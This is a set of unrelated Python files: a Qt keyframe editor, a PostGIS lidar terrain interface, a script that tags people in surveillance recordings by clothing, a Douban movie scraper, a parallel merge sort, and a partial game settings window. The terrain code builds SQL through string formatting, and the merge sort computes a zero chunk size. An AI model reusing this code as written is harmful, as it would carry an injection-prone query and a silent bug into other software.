class SequenceCombo(QComboBox):
def __init__(self, api):
QComboBox.__init__(self)
self.api = api
self.update()
self.api.sequence.namesLoaded.connect(self.update)
self.activated.connect(self.onActivated)
def onActivated(self, index):
self.api.sequence.load(self.itemText(index))
def showPopup(self):
self.api.sequence.reloadNames()
QComboBox.showPopup(self)
def update(self):
self.clear()
for name in self.api.sequence.names:
self.addItem(name)
self.setCurrentIndex(self.api.sequence.index)
class SequenceSelectedView(QWidget):
def __init__(self, api, tracks):
QWidget.__init__(self)
self.api = api
self.api.playback.updated.connect(self.update)
self.api.sequence.updated.connect(self.update)
self.tracks = tracks
self.tracks.selectionChanged.connect(self.update)
self.form = QFormLayout(self)
self.setLayout(self.form)
self.layout()
self.update()
def layout(self):
self.label = QLabel()
self.time = FloatInput()
self.blend = QComboBox()
self.value = HBoxWidget()
self.valueLabel = QLabel('多选')
self.valueFloat = FloatInput()
self.valueBool = BooleanInput()
self.valueVector = VectorInput()
self.valueColor = ColorInput()
self.value.addWidget(self.valueLabel)
self.value.addWidget(self.valueFloat)
self.value.addWidget(self.valueBool)
self.value.addWidget(self.valueVector)
self.value.addWidget(self.valueColor)
self.blend.activated.connect(self.updateBlend)
for option in self.api.sequence.blendOptions:
self.blend.addItem(option)
self.blendHelp = QPushButton()
self.blendHelp.setFixedWidth(20)
self.blendHelp.setIcon(self.style().standardIcon(QStyle.SP_TitleBarContextHelpButton))
self.blendHelp.clicked.connect(self.openBlendHelp)
self.form.addRow('', self.label)
self.form.addRow('时间', self.time)
self.form.addRow('帧模式', HBoxWidget(self.blend, self.blendHelp))
"""
由于关键帧模式blend直接调用了库,无法对名词进行汉化,后续版本尽量添加翻译
"""
self.form.addRow('参数', self.value)
self.time.valueChanged.connect(self.updateTime)
self.valueFloat.valueChanged.connect(self.updateValue)
self.valueBool.valueChanged.connect(self.updateValue)
self.valueVector.valueChanged.connect(self.updateValue)
self.valueColor.valueChanged.connect(self.updateValue)
self.blend.activated.connect(self.updateBlend)
def openBlendHelp(self):
threading.Thread(target=lambda: webbrowser.open_new('https://easings.net')).start()
def update(self):
selected = self.tracks.selectedKeyframes()
self.setVisible(len(selected))
self.time.setRange(0, self.api.playback.length)
blending = list(set([key.blend for key in selected]))
self.label.setText("已选择{}个关键帧".format(len(selected)))
if len(blending) == 1:
self.blend.setCurrentText(blending[0])
else:
self.blend.setCurrentIndex(-1)
times = list(set([key.time for key in selected]))
if len(times):
self.time.update(times[0])
if len(set([key.valueType for key in selected])) == 1:
valueType = selected[0].valueType
if valueType == 'float':
self.valueFloat.update(selected[0].value)
self.valueLabel.setVisible(False)
self.valueFloat.setVisible(True)
self.valueBool.setVisible(False)
self.valueVector.setVisible(False)
self.valueColor.setVisible(False)
elif valueType == 'bool':
self.valueBool.update(selected[0].value)
self.valueLabel.setVisible(False)
self.valueFloat.setVisible(False)
self.valueBool.setVisible(True)
self.valueVector.setVisible(False)
self.valueColor.setVisible(False)
elif valueType == 'vector':
self.valueVector.update(selected[0].value)
self.valueLabel.setVisible(False)
self.valueFloat.setVisible(False)
self.valueBool.setVisible(False)
self.valueVector.setVisible(True)
self.valueColor.setVisible(False)
elif valueType == 'color':
self.valueColor.update(selected[0].value)
self.valueLabel.setVisible(False)
self.valueFloat.setVisible(False)
self.valueBool.setVisible(False)
self.valueVector.setVisible(False)
self.valueColor.setVisible(True)
else:
self.valueLabel.setVisible(True)
self.valueFloat.setVisible(False)
self.valueBool.setVisible(False)
self.valueVector.setVisible(False)
self.valueColor.setVisible(False)
def updateTime(self):
for item in self.tracks.selectedKeyframes():
item.time = self.time.value()
def updateValue(self, value):
for item in self.tracks.selectedKeyframes():
item.value = value
def updateBlend(self, index):
for item in self.tracks.selectedKeyframes():
item.blend = self.blend.itemText(index)
|
terrain_interface.py
|
import random
import shapely
from sqlalchemy import create_engine, and_
from psycopg2.pool import ThreadedConnectionPool
import psycopg2
from sqlalchemy.orm import sessionmaker
from geoalchemy2.functions import GenericFunction
from geoalchemy2 import Geometry
from geoalchemy2.shape import to_shape, from_shape
from shapely.geometry import Point
import multiprocessing as mp
from more_itertools import chunked
from libterrain.link import Link, ProfileException
from libterrain.building import Building_CTR, Building_OSM
from libterrain.comune import Comune
class ST_MakeEnvelope(GenericFunction):
name = 'ST_MakeEnvelope'
type = Geometry
class BaseInterface():
def __init__(self, DSN, lidar_table, srid='4326'):
self.DSN = DSN
self.srid = '4326'
self._set_dataset()
self.lidar_table = lidar_table
self.srid = srid
def _set_dataset(self):
self.buff = 0.5
# The size of the buffer depends on the precision of the lidar dataset
# For 1x1m 0.5m is fine, but for other dataset such as Lyon's 30cm one,
# another buffer might be needed
def _profile_osm(self, param_dict, conn):
# loop over all the orders that we have and process them sequentially.
src = param_dict['src'] # coords must be shapely point
#src_h = param_dict['src']['height']
dst = param_dict['dst'] # coords must be shapely point
#dst_h = param_dict['dst']['height']
srid = param_dict['srid']
lidar_table = param_dict['lidar_table']
buff = param_dict['buff']
cur = conn.cursor()
#TODO: use query formatting and not string formatting
query = """WITH buffer AS(
SELECT
ST_Buffer_Meters(
ST_MakeLine(
ST_GeomFromText('{2}', {0}),
ST_GeomFromText('{3}', {0})
), {4}
) AS line
),
lidar AS(
WITH
patches AS (
SELECT pa FROM {1}
JOIN buffer ON PC_Intersects(pa, line)
),
pa_pts AS (
SELECT PC_Explode(pa) AS pts FROM patches
),
building_pts AS (
SELECT pts, line FROM pa_pts JOIN buffer
ON ST_Intersects(line, pts::geometry)
)
SELECT
PC_Get(pts, 'z') AS z,
ST_Distance(pts::geometry,
ST_GeomFromText('{2}', {0}),
true
) as distance
FROM building_pts
)
SELECT DISTINCT on (lidar.distance)
lidar.distance,
lidar.z
FROM lidar ORDER BY lidar.distance;
""".format(srid, lidar_table, src['coords'].wkt, dst['coords'].wkt, buff)
cur.execute(query)
q_result = cur.fetchall()
if cur.rowcount == 0:
return None
# remove invalid points
# TODO: Maybe DBMS can clean this up
profile = filter(lambda a: a[0] != -9999, q_result)
# cast everything to float
d, y = zip(*profile)
y = [float(i) for i in y]
d = [float(i) for i in d]
profile = list(zip(d, y))
try:
phy_link = Link(profile, src['coords'], dst['coords'], src['height'], dst['height'])
if phy_link and phy_link.loss > 0:
link = {}
link['src'] = src
link['dst'] = dst
link['loss'] = phy_link.loss
link['src_orient'] = phy_link.Aorient
link['dst_orient'] = phy_link.Borient
return link
except (ZeroDivisionError, ProfileException) as e:
pass
return None
class ParallelTerrainInterface(BaseInterface):
def __init__(self, DSN, lidar_table, processes=2):
super(ParallelTerrainInterface, self).__init__(DSN, lidar_table)
self.processes = processes
self.querier = []
# Connection to PSQL
self.tcp = ThreadedConnectionPool(1, 100, DSN)
# MT Queryier
self.workers_query_order_q = mp.Queue()
self.workers_query_result_q = mp.Queue()
self.conns = [self.tcp.getconn() for i in range(processes)]
for i in range(self.processes):
t = mp.Process(target=self._query_worker, args=[self.conns[i]])
self.querier.append(t)
t.daemon = True
t.start()
def _query_worker(self, conn):
while(True):
order = self.workers_query_order_q.get(block=True)
link = self._profile_osm(order, conn)
self.workers_query_result_q.put(link)
def get_link_parallel(self, src, dst_list):
"""Calculate the path loss between two lists of building
"""
links = []
params = [{'src': src,
'dst': dst_list[i],
'srid': self.srid,
'lidar_table': self.lidar_table,
'buff': self.buff
}for i in range(len(dst_list))]
# add orders in the queue
for order in params:
self.workers_query_order_q.put(order)
# wait for all the orders to come back
while len(links) < len(dst_list):
links.append(self.workers_query_result_q.get(block=True))
return links
class SingleTerrainInterface(BaseInterface):
def __init__(self, DSN, lidar_table):
super(SingleTerrainInterface, self).__init__(DSN, lidar_table)
try:
self.conn = psycopg2.connect(DSN)
except psycopg2.Error:
print("I am unable to connect to the database")
def get_link(self, source, destination):
params = {
'src': source,
'dst': destination,
'srid': self.srid,
'lidar_table': self.lidar_table,
'buff': self.buff
}
profile = self._profile_osm(params, self.conn)
return profile
|
add_recording_bookmark.py
|
import sys
sys.path.append('../')
sys.path.append('../TensorFlow-2.x-YOLOv3')
sys.path.append('../mmfashion')
import os
import cv2
import numpy as np
import tensorflow as tf
import torch
from yolov3.utils import load_yolo_weights, image_preprocess, postprocess_boxes, nms, draw_bbox, read_class_names
from deep_sort import generate_detections as gdet
from deep_sort.tracker import Tracker
from deep_sort.detection import Detection
from deep_sort import nn_matching
from yolov3.configs import *
import time
from yolov3.yolov4 import Create_Yolo
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
from utils import setup_tf_conf, get_latest_frame
setup_tf_conf()
from mmcv import Config
from mmcv.runner import load_checkpoint
from mmfashion.core import AttrPredictor, CatePredictor
from mmfashion.models import build_predictor
from mmfashion.utils import get_img_tensor_from_cv2, get_imgs_tensor_from_cv2
from webAPI import WebAPI
import queue
import threading
from collections import Counter
# replace the following with your NVR and user account
IP_ADDR = 'xxx.xxx.xxx.xxx'
PORT = 'xxxx'
ACCOUNT = 'xxxxxx'
PASSWORD = 'xxxxxx'
RECORDINGS_DIRECTORY = 'recordings'
CHECKPOINT_FILE = '../mmfashion/checkpoint/CateAttrPredict/vgg/global/latest.pth'
CONFIG_FILE = '../mmfashion/configs/category_attribute_predict/global_predictor_vgg.py'
DEEP_SORT_MODEL_FILE = '../TensorFlow-2.x-YOLOv3/model_data/mars-small128.pb'
USE_CUDA = True
if YOLO_TYPE == "yolov4":
Darknet_weights = YOLO_V4_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V4_WEIGHTS
if YOLO_TYPE == "yolov3":
Darknet_weights = YOLO_V3_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V3_WEIGHTS
def category_classifier(model, cate_predictor, track, part, landmark_tensor):
if part == 'upper':
samples = track.upper_samples
elif part == 'lower':
samples = track.lower_samples
else:
raise NameError('Invalid part of body!')
if len(samples) == 0:
return 'Unrecognizable'
imgs_tensor = get_imgs_tensor_from_cv2(samples, True)
attr_prob, cate_prob = model(imgs_tensor, attr=None,
landmark=landmark_tensor, return_loss=False)
results, confidences = cate_predictor.get_prediction_from_samples(
cate_prob, 5)
cate_predictor.show_prediction(cate_prob)
counter = Counter([r[0] for r in results])
votes = counter.most_common()
if len(results) < 1:
result = 'Unrecognizable'
else:
result = votes[0][0]
return result
def categories_classifier(model, cate_predictor, track, landmark_tensor):
upper_result = category_classifier(
model, cate_predictor, track, 'upper', landmark_tensor)
lower_result = category_classifier(
model, cate_predictor, track, 'lower', landmark_tensor)
if upper_result != 'Unrecognizable' and lower_result != 'Unrecognizable':
result = '{} {}'.format(upper_result, lower_result)
elif upper_result != 'Unrecognizable' and lower_result == 'Unrecognizable':
result = upper_result
elif upper_result == 'Unrecognizable' and lower_result != 'Unrecognizable':
result = lower_result
else:
result = 'Unrecognizable'
return result
def predict_tracks_cate(model, cate_predictor, tracks, landmark_tensor, video_path):
marks = []
for track in tracks:
result = categories_classifier(
model, cate_predictor, track, landmark_tensor)
sec_since_start = int(track.msec_since_start // 1000)
sec_since_start = sec_since_start if sec_since_start != 0 else 1
marks.append([sec_since_start, result])
return marks
def add_text_to_bookmarks(bookmarks, marks):
for sec_since_start, text in marks:
if sec_since_start in bookmarks:
bookmarks[sec_since_start].append(text)
else:
bookmarks[sec_since_start] = [text]
def Object_tracking(YoloV3, webapi, recording_id, video_path, model, cate_predictor, landmark_tensor, input_size=416, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors='', Track_only=[]):
# Definition of the parameters
max_cosine_distance = 0.7
nn_budget = None
# initialize deep sort object
encoder = gdet.create_box_encoder(DEEP_SORT_MODEL_FILE, batch_size=1)
metric = nn_matching.NearestNeighborDistanceMetric(
"cosine", max_cosine_distance, nn_budget)
tracker = Tracker(metric)
times = []
if video_path:
vid = cv2.VideoCapture(video_path) # detect on video
else:
vid = cv2.VideoCapture(0) # detect from webcam
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
NUM_CLASS = read_class_names(CLASSES)
key_list = list(NUM_CLASS.keys())
val_list = list(NUM_CLASS.values())
bookmarks = {}
while True:
_, img = vid.read()
print(vid.get(cv2.CAP_PROP_POS_MSEC))
try:
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_image), [
input_size, input_size])
image_data = tf.expand_dims(image_data, 0)
t1 = time.time()
pred_bbox = YoloV3.predict(image_data)
t2 = time.time()
times.append(t2 - t1)
times = times[-20:]
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(
pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
# extract bboxes to boxes (x, y, width, height), scores and names
boxes, scores, names = [], [], []
for bbox in bboxes:
if len(Track_only) != 0 and NUM_CLASS[int(bbox[5])] in Track_only or len(Track_only) == 0:
boxes.append([bbox[0].astype(int), bbox[1].astype(int), bbox[2].astype(
int)-bbox[0].astype(int), bbox[3].astype(int)-bbox[1].astype(int)])
scores.append(bbox[4])
names.append(NUM_CLASS[int(bbox[5])])
# Obtain all the detections for the given frame.
boxes = np.array(boxes)
names = np.array(names)
scores = np.array(scores)
features = np.array(encoder(original_image, boxes))
detections = [Detection(bbox, score, class_name, feature) for bbox,
score, class_name, feature in zip(boxes, scores, names, features)]
# Pass detections to the deepsort object and obtain the track information.
tracker.predict()
deleted_tracks = tracker.update(detections, vid.get(
cv2.CAP_PROP_POS_MSEC), original_image)
# Throw frames into classifier once a person is deleted from the tracker
marks = predict_tracks_cate(
model, cate_predictor, deleted_tracks, landmark_tensor, video_path)
add_text_to_bookmarks(bookmarks, marks)
ms = sum(times)/len(times)*1000
fps = 1000 / ms
print("Time: {:.2f}ms, {:.1f} FPS".format(ms, fps))
marks = predict_tracks_cate(
model, cate_predictor, tracker.tracks, landmark_tensor, video_path)
add_text_to_bookmarks(bookmarks, marks)
timestamp = int(os.path.splitext(video_path)[0].split('-')[-1])
for sec_since_start, texts in bookmarks.items():
webapi.add_bookmark(recording_id, ' | '.join(
texts), '', timestamp + sec_since_start)
def download_recordings(q, webapi):
cameras = webapi.list_cameras()
camera_ids = [camera['id'] for camera in cameras]
if len(camera_ids) > 0:
pass
else:
q.put((-1, 'Error'))
raise NameError('There is no camera in the Serveillance Station!')
recordings = webapi.list_recordings()
recording_ids = [recording['id'] for recording in recordings]
recording_ids = recording_ids[1:] # skip the current recording
if not os.path.exists(RECORDINGS_DIRECTORY):
os.mkdir(RECORDINGS_DIRECTORY)
for recording_id in recording_ids:
recording_filename = webapi.download_recording(
recording_id, RECORDINGS_DIRECTORY)
q.put((recording_id, recording_filename))
q.put((-1, 'Done'))
def process_recordings(q, webapi):
# Initialize clothe category classifier
cfg = Config.fromfile(CONFIG_FILE)
landmark_tensor = torch.zeros(8)
model = build_predictor(cfg.model)
load_checkpoint(model, CHECKPOINT_FILE, map_location='cpu')
print('model loaded from {}'.format(CHECKPOINT_FILE))
if USE_CUDA:
model.cuda()
landmark_tensor = landmark_tensor.cuda()
model.eval()
cate_predictor = CatePredictor(cfg.data.test, tops_type=[1])
# Initialize tracker model
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE)
load_yolo_weights(yolo, Darknet_weights) # use Darknet weights
while True:
if q.empty():
time.sleep(1)
continue
recording_id, recording_filename = q.get()
if recording_id == -1:
break
recording_filepath = os.path.join(
RECORDINGS_DIRECTORY, recording_filename)
Object_tracking(yolo, webapi, recording_id, recording_filepath, model, cate_predictor, landmark_tensor, iou_threshold=0.1,
rectangle_colors=(255, 0, 0), Track_only=["person"])
def main():
webapi = WebAPI(IP_ADDR, PORT, ACCOUNT, PASSWORD)
q = queue.Queue()
p1 = threading.Thread(target=download_recordings, args=([q, webapi]))
p2 = threading.Thread(target=process_recordings, args=([q, webapi]))
p1.start()
p2.start()
p1.join()
p2.join()
webapi.logout()
if __name__ == '__main__':
main()
|
douban.py
|
#coding:utf-8
#多一个线程时不时序列化
#{
# visited
# n
#}
#载入时自动使viited.pop()作为最新的url
#n = num
#提供一些爬取豆瓣的api
import requests
from bs4 import BeautifulSoup
from queue import Queue
import threading
import re
import time
import os.path
import json
import random
HEADER={
"Host": "movie.douban.com",
"scheme":"https",
"version":"HTTP/1.1",
"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q = 0.8",
"accept-encoding":"gzip,deflate,sdch",
"accept-language":"zh-CN,zh;q=0.8",
"cache-control":"max-age=0",
"cookie":'',#add your cookie
"referer":"https://book.douban.com/subject/26757148/?icn=index-editionrecommend",
"upgrade-insecure -requests":"1",
"user-agent":"Mozilla / 5.0(WindowsNT6.3;"\
"WOW64) AppleWebKit / 537.36(KHTML, likeGecko) Chrome / 48.0.2564.116Safari / 537.36"
}
import logging
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
filename='spider.log',
filemode='a')
class myQueue(Queue):
def __init__(self,type1=None,type2=None):
super().__init__()
#return list
def to_list(self):
copy_list = []
length = self.qsize()
for x in range(length):
value = self.get()
copy_list.append(value)
self.put(value)
return copy_list
class DouBanMovieSpider:
def __init__(self):
self._visited =[]
self._n = 1
self._url = "https://movie.douban.com/"
self._mutex = threading.Lock()
self._threading_flag = True
self._mission = myQueue()
#读入文件的配置
def configure(self,filename):
fp = open(filename,'r')
js = json.load(fp)
fp.close()
self._visited = js.get("visited",[])
self._n = int(js.get("n",1))
mission_list = js.get("mission",myQueue())
if isinstance(mission_list,myQueue):
self._mission = mission_list
else:
for url in mission_list:
self._mission.put(url)
if len(self._visited) >= 1:
self._url = self._visited.pop()
print("now have %d mission totally"%(self._mission.qsize()))
#周期检查,如果查找满了50 条,则序列化
def _check(self):
temp = -1
while self._threading_flag:
# print(self._n)
flag = False
length = len(self._visited)
if (length % 15 ==0) and temp != length:
flag = True
temp = length
if flag :
if self._mutex.acquire():
try:
#print("写入!")
fp = open("info.txt","w")
json.dump({
"visited":self._visited,
"n":length,
"mission":self._mission.to_list()
},fp)
fp.close()
logging.info("Write information succeed!")
except Exception as err:
logging.info("Check Error %s"%(str(err)))
self._mutex.release()
time.sleep(1)
fp = open("info.txt","w")
json.dump({
"visited":self._visited,
"n":len(self._visited),
"mission":self._mission.to_list()
},fp)
fp.close()
#提取出最新的电影
def _new_movie(self,html):
#print(html)
soup = BeautifulSoup(html,"html.parser")
li_list = soup.find_all('li')
new_movie_list = []
for li in li_list:
if li.get("data-title"):
title = li.get("data-title","unknown")
release = li.get("data-release","unknown")
duration = li.get("data-duration","unknown")
region = li.get("data-region","unknown")
director = li.get("data-director","unknown")
actors = li.get("data-actors","unknown")
new_movie_list.append(
(title,release,duration,region,director,actors)
)
return new_movie_list
#获取最新电影
def get_new_movie(self,timeout=5):
response = requests.get("https://movie.douban.com/", headers=HEADER,timeout=timeout)
if str(response.status_code) == '200':
response.encoding="utf-8"
html = response.text
movie_info_list = self._new_movie(html)
return movie_info_list
else:
return []
#从html页面内获取电影信息,以列表的方式返回
def _get_info(self,html):
soup = BeautifulSoup(html, "html.parser")
span = soup.find("span",attrs={"property":"v:itemreviewed"})
#title
try:
title = span.string
except Exception:
title = ""
# span2 = soup.find("span",attrs={"class":"year"})
# #year
# year = span2.string
#导演名字
d_a = soup.find("a",attrs={"rel":"v:directedBy"})
try:
d_name = d_a.string
except Exception:
d_name = ""
#编剧名字列表
w_list = soup.find_all(href = re.compile("/celebrity/\d{7}/"),attrs={"rel":""})
try:
w_name_list = [name.string for name in w_list]
except Exception:
w_name_list = [""]
#主演名字列表
actor_list = soup.find_all(attrs={"rel":"v:starring"})
try:
actor_name_list = [name.string for name in actor_list]
except Exception:
actor_name_list = [""]
#电影类型
movie_type_span = soup.find("span",attrs={"property":"v:genre"})
try:
movie_type_name = movie_type_span.string
except Exception:
movie_type_name = ""
#片长
runtime_span = soup.find("span",attrs={"property":"v:runtime"})
try:
runtime = runtime_span.string
except Exception:
runtime = ""
#地区
area_index = html.find("制片国家/地区:</span>")
end_index = html.find("br",area_index)
if area_index != -1 and end_index != -1:
area = html[area_index+16:end_index-1]
else:
area = ""
#具体上映日期
date_span = soup.find("span",attrs={"property":"v:initialReleaseDate"})
try:
date = date_span.string
except Exception:
date = ""
#评分
star_strong = soup.find("strong",attrs={"property":"v:average"})
try:
star = star_strong.string
except Exception:
star = "-1"
#影评区
comment_div_list = soup.find_all("div",attrs={"class":"comment"})
#筛选出纯影评
def _get_comment(tag):
try:
return tag.p.string.replace(" ","").replace("\n","")
except Exception:
return ""
comment_list = [_get_comment(comment) for comment in comment_div_list]
#print(comment_div_list)
#电影信息归结
info = {
"title":title,
"director":d_name,
"writer":"/".join(w_name_list),
"actor":"/".join(actor_name_list),
"type":movie_type_name,
"runtime":runtime,
"area":area,
"date":date,
"star":star,
"comment_list":comment_list
}
return info
#从电影url中获取信息
def get_info_from_movie(self,url,timeout=5):
response = requests.get(url, headers=HEADER, timeout=timeout)
if str(response.status_code) == '200':
response.encoding = "utf-8"
html = response.text
return self._get_info(html)
else:
return dict()
#从主页中提取出需要爬取得url,返回其列表
def _get_movie_url(self,html):
#主页入口
exp = "https://movie.douban.com/subject/\d{8}/\?from"
soup = BeautifulSoup(html,"html.parser")
movie_list = soup.find_all("a",href=re.compile(exp))
url_list = [movie.get("href") for movie in movie_list]
return url_list
#将info序列化,写进n.txt
def _write_file(self,dirname,info,n):
filename = os.path.join(dirname,"{}.txt".format(n))
f = open(filename,'w')
json.dump(info,f)
f.close()
#spider内部实现函数
def _spider(self,dirname,mission,timeout,num):
record = dict()#(value:time out number,key:url)
#爬取
while (not mission.empty() )and ((self._n <= num) or (num == -1)):
url = mission.get(timeout=5)
try:
if url not in self._visited:
response = requests.get(url,headers=HEADER,timeout=timeout)
else:
logging.info("%s is in %s"%(url,self._visited.index(url)))
continue
except Exception as err:
#曾经的错误次数
was = record.get(url,0)
# if was == 5:
# logging.error(url + " Give Up!\n")
# time.sleep(5)
# continue
#print("\n%s error !\nError is %s!\n Wait a moment!"%(url,str(err)))
logging.error("%s error !\nError is %s!\n Wait a moment!\n"%(url,str(err)))
time.sleep(10)
mission.put(url)
record[url] = was + 1
else:
if str(response.status_code) != '200':
logging.error("url:%s The code is %s"%(url,response.status_code))
was = record.get(url, 0)
if was == 2:
logging.error(url + " Give Up!\n")
time.sleep(5)
continue
mission.put(url)
time.sleep(10)
record[url] = was + 1
# logging.error(url + " Give Up!\n")
continue
else:
#成功访问
response.encoding = "utf-8"
html = response.text
next_url_list = self._get_movie_url(html)
for next_url in next_url_list:
mission.put(next_url)
try:
info = self._get_info(html)
# for key,value in info.items():
# print(key," : ",value)
self._write_file(dirname,info,self._n)
except Exception as err:
logging.error("URL: %s Get information error! Reason: "%(url)+str(err))
#was = record.get(url, 0)
# if was == 2:
# logging.error(url + " Give Up!\n")
# time.sleep(5)
# continue
#mission.put(url)
time.sleep(10)
#record[url] = was + 1
else:
#print("%s succeed! Already finish %d/%d"%(url,self._n,num))
logging.info("%s succeed! Already finish %d/%d\n"%(url,self._n,num))
if self._mutex.acquire():
#print("append")
self._visited.append(url)
self._mutex.release()
self._n += 1
time.sleep(random.randrange(10,22,1))
#在dirname下建立收集下来的库
def spider(self,dirname,timeout=5,num=-1):
#开启检测进程
check_t = threading.Thread(target=self._check,name="check")
check_t.start()
#打开主页
response = requests.get(self._url,headers=HEADER,timeout=timeout)
if str(response.status_code) != '200':
print("Begin Failed!")
response.encoding="utf-8"
html = response.text
movie_url = self._get_movie_url(html)
#print(movie_url)
for url in movie_url:
self._mission.put(url,timeout=5)
self._spider(dirname=dirname,mission=self._mission,timeout=timeout,num=num)
self._threading_flag = False
# if __name__ == '__main__':
# # f = open("123.html",'r',encoding='utf-8')
# # html = f.read()
# # f.close()
# d = DouBanMovieSpider()
# # res = d._get_movie_url(html)
# # print(res)
# # info = d._get_info(html)
# # for key,value in info.items():
# # print(key+": "+str(value))
# # res = d.get_new_movie()
# # for movie in res:
# # print(movie)
# d.spider("F://doubandata",num=10)
|
ms.py
|
"""
merge sort parallelization
"""
import math
import os, sys, time
import math, random
from multiprocessing import Process, Manager
def mergeSort(a):
len_a = len(a)
if len_a <= 1:
return a
m = int(math.floor(len_a) / 2)
left = a[0:m]
right = a[m:]
left = mergeSort(left)
right = mergeSort(right)
return merge(left, right)
def merge(left, right):
a = []
while len(left) > 0 or len(right) > 0:
if len(left) > 0 and len(right) > 0:
if left[0] <= right[0]:
a.append(left.pop(0))
else:
a.append(right.pop(0))
elif len(left) > 0:
a.append(left.pop(0))
elif len(right)> 0:
a.append(right.pop(0))
return a
def mergeSortP(sub_list):
responses.append(mergeSort(sub_list))
def mergeP(sub_list_left, sub_list_right):
responses.append(merge(sub_list_left, sub_list_right))
if __name__ == '__main__':
l = [ 1, 2, 7]
r = [ 3, 5, 20]
s = l[:]
s.extend(r[:])
print merge(l, r)
print s
print mergeSort(s)
# mp solution
manager = Manager()
responses = manager.list()
max_n = 5 * 10**5
print max_n
a = [random.randint(0, n*100) for n in range(0, max_n)]
t0 = time.time()
s = mergeSort(a)
t1 = time.time()
print 'sequential ms: ', t1-t0
s_p = a[:]
t2 = time.time()
s_p.sort()
t3 = time.time()
print 'python: ', t3-t2
cores = 4
if cores > 1:
t4 = time.time()
step = int( math.floor(1/ cores))
offset = 0
p = []
for n in range(0, cores):
if n < cores - 1:
proc = Process(target=mergeSortP,
args=(a[n*step:(n+1)*step],))
else:
proc = Process(target=mergeSortP, args=( a[n*step:],))
p.append(proc)
for proc in p:
proc.start()
for proc in p:
proc.join()
t5 = time.time()
print 'Final merge'
t6 = time.time()
p = []
if len(responses) > 2:
while len(responses) > 0:
proc = Process(target=mergeP, args=(responses.pop(0),
responses.pop(0)))
p.append(proc)
for proc in p:
proc.start()
for proc in p:
proc.join()
a = merge(responses[0], responses[1])
t7 = time.time()
print 'mp time: ', t7-t4
print 'final merge time: ', t7-t6
|
allsettings.py
|
# Copyright (c) 2011-2020 Eric Froemling
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -----------------------------------------------------------------------------
"""UI for top level settings categories."""
from __future__ import annotations
from typing import TYPE_CHECKING
import _ba
import ba
if TYPE_CHECKING:
from typing import Tuple, Optional, Union
class AllSettingsWindow(ba.Window):
"""Window for selecting a settings category."""
def __init__(self,
transition: str = 'in_right',
origin_widget: ba.Widget = None):
# pylint: disable=too-many-statements
# pylint: disable=too-many-locals
import threading
# Preload some modules we use in a background thread so we won't
# have a visual hitch when the user taps them.
threading.Thread(target=self._preload_modules).start()
ba.set_analytics_screen('Settings Window')
scale_origin: Optional[Tuple[float, float]]
if origin_widget is not None:
self._transition_out = 'out_scale'
scale_origin = origin_widget.get_screen_space_center()
transition = 'in_scale'
else:
self._transition_out = 'out_right'
scale_origin = None
uiscale = ba.app.uiscale
width = 900 if uiscale is ba.UIScale.SMALL else 580
x_inset = 75 if uiscale is ba.UIScale.SMALL else 0
height = 435
# button_height = 42
self._r = 'settingsWindow'
top_extra = 20 if uiscale is ba.UIScale.SMALL else 0
uiscale = ba.app.uiscale
super().__init__(root_widget=ba.containerwidget(
size=(width, height + top_extra),
transition=transition,
toolbar_visibility='menu_minimal',
scale_origin_stack_offset=scale_origin,
scale=(1.75 if uiscale is ba.UIScale.SMALL else
1.35 if uiscale is ba.UIScale.MEDIUM else 1.0),
stack_offset=(0, -8) if uiscale is ba.UIScale.SMALL else (0, 0)))
if ba.app.toolbars and uiscale is ba.UIScale.SMALL:
self._back_button = None
ba.containerwidget(edit=self._root_widget,
on_cancel_call=self._do_back)
else:
self._back_button = btn = ba.buttonwidget(
parent=self._root_widget,
autoselect=True,
position=(40 + x_inset, height - 55),
size=(130, 60),
scale=0.8,
text_scale=1.2,
label=ba.Lstr(resource='backText'),
button_type='back',
on_activate_call=self._do_back)
ba.containerwidget(edit=self._root_widget, cancel_button=btn)
ba.textwidget(parent=self._root_widget,
position=(0, height - 44),
size=(width, 25),
text=ba.Lstr(resource=self._r + '.titleText'),
color=ba.app.title_color,
h_align='center',
v_align='center',
maxwidth=130)
if self._back_button is not None:
ba.buttonwidget(edit=self._back_button,
button_type='backSmall',
size=(60, 60),
label=ba.charstr(ba.SpecialChar.BACK))
v = height - 80
v -= 145
basew = 280 if uiscale is ba.UIScale.SMALL else 230
baseh = 170
x_offs = x_inset + (105 if uiscale is ba.UIScale.SMALL else
72) - basew # now unused
x_offs2 = x_offs + basew - 7
x_offs3 = x_offs + 2 * (basew - 7)
